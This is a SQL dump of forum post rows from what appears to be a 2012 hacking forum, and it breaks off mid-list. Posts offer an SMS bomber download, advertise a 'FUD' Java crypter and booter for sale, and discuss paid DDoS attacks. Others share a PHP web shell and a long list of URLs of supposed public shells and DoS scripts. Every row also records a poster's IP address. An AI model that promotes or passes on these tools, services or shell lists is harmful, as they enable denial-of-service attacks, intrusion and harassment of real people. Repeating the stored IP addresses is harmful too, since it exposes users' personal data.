'0', '0', '1', '06df3443608c0769265b57de6c6aefea', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7278', '1226', '7250', '30', 'RE: Release Cracked - Youtube Booster Pro edition!', '0', '257', 'XxTREYZxX', '1352451314', 'Thanks so much for the share.', '203.104.11.12', '-882373876', '1', '0', '0', '0', '1', '54bfd53270be6c321ec33cc769528fd4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7279', '1230', '0', '49', 'great suggestion', '19', '257', 'XxTREYZxX', '1352451665', 'Hey LH, my suggestion is that we should do a point system and with point system. Make a point shop where you can buy Elite upgrade Dubstep songs donwnload, Etc.', '203.104.11.12', '-882373876', '1', '0', '0', '0', '1', 'b8bb75d5db1078960e32adba98c8a2ea', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7280', '1231', '0', '15', '[link included]Skype Sms Bomber Super Hard & Heavy - WORLDWIDE', '0', '335', 'loser386', '1352452340', '[img]http://fortunewallstreet.files.wordpress.com/2011/05/skype-450x450.png[/img] Skype SmS Bomber Allow you to do worldwide sms bombing with the fast and powerful server of skype You just Need A Skype Account for this and i recommended to make a fake one and then just follow the TuT How It,s Work [video=youtube]www.youtube.com/watch?v=5HJPwQCUw6s[/video] How To Get It : [spoiler][url=http://dl.dropbox.com/u/51740637/Jays%20Booter%20v5.8.2/sms%20bomber.html]Enjoy[/url][/spoiler] Note: your skype account gets banned when using this. So do not use your main skype account. make a fake one :)', '110.36.19.190', '1847858110', '0', '0', '0', '0', '1', '5f4eb3c36880880ea2026f66a813d1b9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7281', '1231', '7280', '15', 'RE: [link included]Skype Sms Bomber Super Hard & Heavy - WORLDWIDE', '0', '82', 'iTzIpod', '1352464477', 'To send SMS, don\'t you need Skype Credit??', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '22ddd5e7a7fd49a890afcb54290d3fa2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7282', '861', '4598', '7', 'RE: L33T Hacking Milestones', '0', '82', 'iTzIpod', '1352464544', 'Congratulations t3h jok3r. Finally 1000 posts. ._. I reached that milestone like 2-4 weeks ago. Come on. :/', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '88f689757083793f92fff3632b987847', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7283', '1231', '7280', '15', 'RE: [link included]Skype Sms Bomber Super Hard & Heavy - WORLDWIDE', '0', '258', 'PiXEL^OG', '1352471127', 'Looks fake to me.. DON\'T DOWNLOAD YOU GUYS KNOW THIS LOOKS BAD', '139.190.235.246', '-1950422026', '0', '0', '0', '0', '1', 'd406eef43a2b8099e53a173d363a7b6a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7284', '1230', '7279', '49', 'RE: great suggestion', '0', '53', 'sirchamp', '1352473035', 'Not a bad idea even though its used by many other forums... I think we should do a point system.', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', 'fbf0a56963031959813acf72ac72a2e4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7285', '1226', '7250', '30', 'RE: Release Cracked - Youtube Booster Pro edition!', '0', '53', 'sirchamp', '1352474295', 'Ill try it. Thanks for share.', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', 'b96907b3b7bf0223f9c49695899d7ec0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7286', '1218', '7179', '17', 'RE: Camdecoy bitch available here', '0', '323', 'moruzaks', '1352476992', 'i would love to have the vid men....', '216.119.145.99', '-663252637', '0', '0', '0', '0', '1', '6d9888396d599014e823a7d5a05b2f17', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7287', '1230', '7279', '49', 'RE: great suggestion', '0', '61', 'NXK', '1352479091', 'Elite upgrades pay for our hosting, So that wont be happening. But I like the song downloads and things like that.', '99.252.235.12', '1677519628', '1', '0', '0', '0', '1', 'c7381ea0f54bba303d31658b5a50c3fd', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7288', '1220', '7193', '12', 'RE: Big list Hacking tutorials with .txt', '0', '61', 'NXK', '1352479144', 'Seems like a good collection of tutorials. Nice share :)', '99.252.235.12', '1677519628', '1', '0', '0', '0', '1', '52676119aa41fc2131958fec7a1aa958', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7289', '1232', '0', '9', 'Adfoc.us Trick', '0', '53', 'sirchamp', '1352486031', 'Im realising the trick to cheat adfoc.us By now everyone knows it... and adfoc.us will probobally not payout. [lock] http://www.mediafire.com/?xmcjmzw71map00x[/lock] Hope you guys like it..', '188.155.56.90', '-1130678182', '1', '0', '61', '1352493803', '1', '1ed205f76bf906d63f9ac4a751fc3d3d', '0', '1352493803'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7290', '1232', '7289', '9', 'RE: Adfoc.us Trick', '0', '67', 'HoverCatz', '1352486205', 'Thanks for this :)', '178.74.57.144', '-1303758448', '1', '0', '0', '0', '1', '405de458543efb3be1e53e82b350ffb9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7291', '1228', '7256', '35', 'RE: New banner!', '0', '67', 'HoverCatz', '1352486494', 'Cool, but i think i will stick to the current one. :)', '178.74.57.144', '-1303758448', '1', '0', '0', '0', '1', '9b5d0cf269e229e2628000093f23e223', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7294', '1232', '7289', '9', 'RE: Adfoc.us Trick', '0', '82', 'iTzIpod', '1352495703', 'Thanks for sharing. I\'m wondering what it is.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'cdf53d1b73d163cdf403f4a8fd4cb459', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7293', '1233', '0', '15', '[SALES] Sparky Java 2.0 | FUD Jar | 15 Domains | Addon:Skype Resolver| Booter', '0', '61', 'NXK', '1352491084', '[align=center]Sparky Java 2.0 | FUD Jar | 15 Domains | Addon:Skype Resolver| Booter 15LR | 20 PP [img]http://i.imgur.com/IgSbh.png[/img] [img]http://i.imgur.com/toTEj.png[/img] 20$ Pay pal 15$ LR [img]http://i.imgur.com/EoSwJ.png[/img] Contact madhacker on site. http://l33thacking.net/user-337.html Or add him on skype superhero619 <- With the note \"Sparky Java\" Some pictures http://imgur.com/a/6xXsG#0 I use this and can Say it\'s awesome :)! [/align]', '99.252.235.12', '1677519628', '1', '0', '0', '0', '1', '88a983e19279e9b4f781ebd9151a4789', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7295', '1231', '7280', '15', 'RE: [link included]Skype Sms Bomber Super Hard & Heavy - WORLDWIDE', '0', '82', 'iTzIpod', '1352495864', 'I don\'t trust this user or this thread.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e339fa0c1b0490aec47a0901d19f3ffa', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7296', '1231', '7280', '15', 'RE: [link included]Skype Sms Bomber Super Hard & Heavy - WORLDWIDE', '0', '1', 't3h jok3r', '1352496640', 'Boot means to hit offline. Why do you have the right click disabled? Don\'t you need to enter the number of the victim you are sending SMS to?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '9eed84c8bd66ac61fae74467ee52e5f5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7297', '1231', '7280', '15', 'RE: [link included]Skype Sms Bomber Super Hard & Heavy - WORLDWIDE', '0', '61', 'NXK', '1352497096', 'Use this program with caution.', '99.252.235.12', '1677519628', '1', '0', '61', '1352497106', '1', '3bf276f94268d294bdf7a204f0a22837', '0', '1352497106'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7298', '1231', '7280', '15', 'RE: [link included]Skype Sms Bomber Super Hard & Heavy - WORLDWIDE', '0', '82', 'iTzIpod', '1352500126', 'Why do we have to use it with caution NXK?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '39cc1b5dfdbe18bb24a65691facfe7f3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7299', '1234', '0', '46', 'Did someone ever hack you through phishing?', '0', '4', 'Triple H', '1352517114', 'Did you ever get hacked by phishing on any site?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '38c84b193f6b1efac3b19c3e9796a55f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7300', '398', '1860', '21', 'RE: [Cheap] [Strong] GRONgamer\'s DDoS\'ing Service! [$5/Hour]', '0', '4', 'Triple H', '1352517305', 'Can you hit people offline too or just sites?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'dc3ffaa0f03c083856053d8003cf7a63', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7301', '1232', '7289', '9', 'RE: Adfoc.us Trick', '0', '4', 'Triple H', '1352517456', 'Thanks will try this out and does this also work with adf.ly?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '9eeeecafe743d86c8014974fe77ebcc8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7302', '398', '1860', '21', 'RE: [Cheap] [Strong] GRONgamer\'s DDoS\'ing Service! [$5/Hour]', '0', '100', '??zg???g????61', '1352517538', 'I can do both. :) you interested?', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', 'b3b07ec414d484508570fe08bed14a66', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7303', '398', '1860', '21', 'RE: [Cheap] [Strong] GRONgamer\'s DDoS\'ing Service! [$5/Hour]', '0', '82', 'iTzIpod', '1352517974', 'Get on Skype please Gron <3', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '6d8866164a52618ff04776836e3e6973', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7304', '1232', '7289', '9', 'RE: Adfoc.us Trick', '0', '82', 'iTzIpod', '1352518006', 'I doubt it does Triple H. Sirchamp, why did you share the secret to your service?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'b6ffac1906ffdc894dc60c263c704d03', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7305', '398', '7302', '21', 'RE: [Cheap] [Strong] GRONgamer\'s DDoS\'ing Service! [$5/Hour]', '0', '4', 'Triple H', '1352518368', '[quote=\'??zg???g????61\' pid=\'7302\' dateline=\'1352517538\'] I can do both. :) you interested? [/quote] No just asking just in case i need it.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '77c8d2a6f638267dfc9a7c29e5371f5d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7306', '1228', '7256', '35', 'RE: New banner!', '0', '4', 'Triple H', '1352518437', 'Not bad but i say the one now is good.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '0227142422f2b71ff5445925fa00ce16', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7307', '1230', '7279', '49', 'RE: great suggestion', '0', '4', 'Triple H', '1352518566', 'Its a nice idea but what would be for sale?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'fa8c7ec8625ac587194199f036355068', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7308', '1229', '7270', '49', 'RE: Just a quick suggestion.', '0', '4', 'Triple H', '1352518606', 'I agree with this and maybe make this some like light grey.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '3848fd6743d523d9bb4973fdcd19409d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7309', '1201', '7064', '64', 'RE: Sinister Movie Rip', '0', '4', 'Triple H', '1352519425', 'Thanks i just watched it and its a boring movie.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '2ce4fa148e3490583d86b2f7d3e25ccf', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7313', '1235', '0', '42', 'Marijuana legalized in two US states', '0', '5', 'Timmy', '1352521201', 'quote]DENVER — For supporters of legalizing marijuana, it was a historic moment, one that drew comparisons to the end of Prohibition: On Tuesday, voters in Colorado and Washington State made it legal to smoke pot recreationally, without any prescription or medical excuse... As soon as the laws are certified, it will be legal under Colorado and Washington law for adults 21 years and older to possess up to an ounce of marijuana. In Colorado, people will be able to grow as many as six plants. In Washington, users will have to buy their marijuana from state-licensed providers... The laws do not allow people to light up in public, and cities and counties will be able to block marijuana retailers, in much the same way that blue laws have restricted alcohol sales for decades. And it remains illegal to drive a motor vehicle while high on the drug... [/quote] Source: http://www.nytimes.com/2012/11/08/us/politics/marijuana-laws-eased-in-colorado-and-washington.html Thought this was pretty big news, it\'s going to be interesting to see how the federal government reacts to this and to see if other states follow Colorado & Washington State in legalization. What are your thoughts on legalization, are you for it or against it?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '898f5d3fca822ea869716884f9b9544e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7314', '19', '54', '16', 'RE: [tut]How to SE your school teachers', '0', '5', 'Timmy', '1352521492', 'Thanks a bunch man this worked. I saved myself from a project and a donation today.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '0630a8fe45df2fb0483191eec02d20af', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7315', '1229', '7270', '49', 'RE: Just a quick suggestion.', '0', '205', 'mothered', '1352521504', 'I support this also. It looks somewhat blurred the way It Is.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '5d4a45a187c600bec294a6cd23548198', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7316', '766', '3902', '20', 'RE: [3/14] War - Crypter [ScanTime] by cris', '0', '5', 'Timmy', '1352521603', 'Why do people use adf.ly/adfocus on virus scans? Thanks btw', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '527128d1694570cb4ce768dcd0117d06', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7317', '1236', '0', '3', 'CloudFlare Issues?', '0', '205', 'mothered', '1352521789', 'Greetings everyone, Majority of times when either trying to get online here, or between posts, there seems to be a CloudFlare Issue, whereby the site Is offline. Down For Everyone Or Just Me, confirms the same. Anyone else experiencing It too? PS: Need to copy this text, In case It goes offline when I try and post It.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'bd97a53612871f9c6503cec3e11d3937', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7318', '1237', '0', '61', 'Suggestion for this section', '0', '5', 'Timmy', '1352521857', 'I think we should also use the lock mycode here because then active people will leech from here.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '80c88414d4d74aeb77ba6b6556ade370', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7319', '1235', '7313', '42', 'RE: Marijuana legalized in two US states', '0', '205', 'mothered', '1352521947', 'I certainly didn\'t see this coming anytime soon. It\'ll be Interesting to see, what the outcome of all this will cause.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '5b4cf8e8e3d5960935cc61468b907d0b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7320', '1236', '7317', '3', 'RE: CloudFlare Issues?', '0', '5', 'Timmy', '1352521965', 'I seem to be having the same issue but only when posting sometimes.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '93e708104df719c9c0b2bf6ee78013d9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7321', '1169', '6836', '3', 'RE: Computing Tab Forum Suggestions', '0', '5', 'Timmy', '1352523105', 'A section for networking discussions such as internet, firewalls etc.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'c06fbc1214d96424e6f27607547da7c6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7322', '1238', '0', '67', 'Slowlowirs Shell .PHP file', '0', '5', 'Timmy', '1352523436', 'Enjoy! [lock] http://www.mediafire.com/?k39f9e61a18bj18 [/lock]', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'd24e1a561a677a1707aa2032552843a4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7323', '1239', '0', '84', '800 shells', '0', '5', 'Timmy', '1352524746', '800 public shells. Not sure if all work or not but check using shell checker. [lock] [code] http://feeds2.feedburner.com/alivingtruth/DRwH http://feeds2.feedburner.com/alivingtruth/DRwH/ http://yogeshmehra1987.110mb.com/index.php http://belakshell.50webs.com/index.php http://urmybest.110mb.com/phpdos.php http://d-dos.50webs.com/ddos.php http://pastie.org/pastes/1044528/download/ http://www.team-crowplay.de/ http://firman-mannte.blogspot.com/ http://pastie.org/pastes/1044528/download http://www.tux-planet.fr/public/hack/ddos/php-dos.phps http://beacheater.blogspot.com/2011/01/php-dos.html http://www.team-crowplay.de/function.php http://avatarmovieonline.110mb.com/ http://aldy.byethost2.com/ http://mehdi4604.persiangig.com/vbulltien/ddos.php http://rahmat.tv/mount/php-dos-coded-by-exe.htm http://niyuavalon.webege.com/phpddos/control/ http://dinamo.com.nu/php/ http://ngoisaoblog.vn/DDOS.php http://www.fahriozturk.tr.gg/111.htm?PHP...7b1fb9bcef/ http://toutsourtous.webobo.biz/html.php?id_menu=3336677 http://tinypaste.com/e38333 http://virusgamingz.roxorgamers.com/ http://www.team-crowplay.de/index.php http://surrealesport.su.funpic.de/index.php?forum-privmsg-new=0&empfid=1 http://www.fahriozturk.tr.gg/111.htm http://www.fahriozturk.tr.gg/111.htm/ http://www.1100f.com/member/ http://www.dinamo.com.nu/php/ http://www.anarchistcookbook.com/showthread.php/33795-PHP-DoS-Script http://www.fahriozturk.tr.gg/111.htm?PHP...7b1fb9bcef/index.php http://www.fahriozturk.tr.gg/111.htm?PHP...7b1fb9bcef http://fahriozturk.tr.gg/111.htm?PHP...7b1fb9bcef http://belsec.skynetblogs.be/post/7896874/next--getting-hacked-to-ddos-another-site-to- http://toutsourtous.webobo.com/html.php?id_menu=3336677 http://dos123.uw.hu/index.php http://odrp.eu.nu/index.php?action=BoardMarkAllAsRead&t=9acba20c952241e625770c058c7470f4dde2990c http://odrp.eu.nu/ http://00000.000a.de/PHP/ http://eq22.weebly.com/ http://odrp.eu.nu/index.php?page=ThreadsFeed&format=atom http://firman-mannte.blogspot.com/2011_04_01_archive.html http://www.fahriozturk.tr.gg/111.htm?PHP...b1fb9bcef/ http://www.rocksecuritycams.741.com/ddos.html http://www.insert-forum.hostujem.sk/ http://www.hesoyam.website.org/ http://toutsourtous.anatoile.com/html.php?id_menu=3206841 http://www.jinggai315.com/lys/ http://www.fahriozturk.tr.gg/111.htm?PHP...7b1fb9b.../ http://www.anarchistcookbook.com/showthread.php/33795-PHP http://www.1100f.com/member http://www.fahriozturk.tr.gg/111.htm?PHPSESSID=8e7.../ http://zhan.liechesk.cn/hechihuagong.com.cn-domain http://www.fahriozturk.tr.gg/111.htm?PHPSESSID=8e7467e5523dbf043564467b1fb9bcef/ http://www.fahriozturk.tr.gg/111.htm?PHP...b1fb9bcef http://d-dos.50webs.com/ddos.php http://www.team-crowplay.de/function.php http://www.fahriozturk.tr.gg/111.htm http://d-dos.50webs.com/ddos.php http://feeds2.feedburner.com/alivingtruth/DRwH/ http://belakshell.50webs.com/index.php http://yogeshmehra1987.110mb.com/index.php http://pastie.org/pastes/1044528/download/ http://urmybest.110mb.com/phpdos.php http://www.team-crowplay.de/ http://feeds2.feedburner.com/alivingtruth/DRwH http://www.1100f.com/member/ http://www.fahriozturk.tr.gg/111.htm http://www.fahriozturk.tr.gg/111.htm?PHP...b1fb9bcef/ http://www.tux-planet.fr/public/hack/ddos/php-dos.phps http://www.dinamo.com.nu/php/ http://www.fahriozturk.tr.gg/111.htm?PHP.../index.php http://www.fahriozturk.tr.gg/111.htm?PHPSESSID=8e7... http://pastie.org/pastes/1044528/download http://www.fahriozturk.tr.gg/111.htm?PHP...7b1fb9b.../ http://eq22.weebly.com/ http://www.team-crowplay.de/index.php http://www.fahriozturk.tr.gg/111.htm?PHP...7b1fb9b... http://www.team-crowplay.de/function.php http://www.fahriozturk.tr.gg/111.htm?PHP...7b1fb9bcef/ http://firman-mannte.blogspot.com/ http://www.fahriozturk.tr.gg/111.htm?PHP...7b1fb9bcef http://firman-mannte.blogspot.com/2011_04_01_archive.html http://toutsourtous.anatoile.com/html.php?id_menu=3206841 http://eq22.weebly.com http://www.team-crowplay.de 